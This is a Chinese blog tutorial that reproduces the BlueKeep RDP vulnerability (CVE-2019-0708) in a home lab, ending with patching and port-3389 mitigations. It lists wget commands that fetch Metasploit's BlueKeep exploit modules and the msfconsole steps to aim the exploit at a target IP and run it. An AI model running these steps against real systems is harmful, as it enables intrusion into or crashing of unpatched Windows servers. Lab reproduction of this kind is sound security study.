标签:rdp bluekeep edb7e20221e2088497d1f61132db3a56f81b8ce9 framework 0708 复现 wget CVE
这几天关于0708漏洞的复现也是沸沸扬扬的,刚好趁着今天有时间自己来操作一波,此次操作的靶机和攻击机都是本人自己搭建的虚拟环境,本教程仅供学习交流~~~
漏洞复现
攻击机:kali系统 ip地址:192.168.107.128
被攻击机:Windows Server 2008 R2 Standard ip地址:192.168.107.145
这里08的系统是我自己在网上下载的,默认也是就打了40个补丁,可以通过systeminfo查看补丁情况,由于都是在虚拟机中搭建的,所以网络设置为NAT模式,保证kali和win2008在同一网段中可以ping通。
在kali中启动msf,输入命令:msfconsole
利用wget 下载0708四件套:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
msf启动的时候会提示:No database support: No database YAML file,说明数据库没启动,运行如下命令即可:
systemctl start postgresql
systemctl enable postgresql
msfdb inti
在msf中reload_all重载ms模块
搜索0708的攻击内核模块:search bluekeep / search 0708
选择攻击模块:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
查看exploit设置:show options
这里rhosts就是目标机器的IP地址
设置攻击目标:set rhosts 192.168.107.145
查看目标环境:show targets
选择目标环境:set target ?
这里?是需要选择的环境类型
开始攻击:run/exploit
这里作者在自己08系统和03中测试一直是蓝屏状态,但是看网上有其他作者复现的是直接可以返回session。
漏洞的修复
- 及时打对应系统的安全补丁
- 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
- 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击
标签:rdp,bluekeep,edb7e20221e2088497d1f61132db3a56f81b8ce9,framework,0708,复现,wget,CVE 来源: https://blog.csdn.net/cj_Allen/article/details/104106682
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。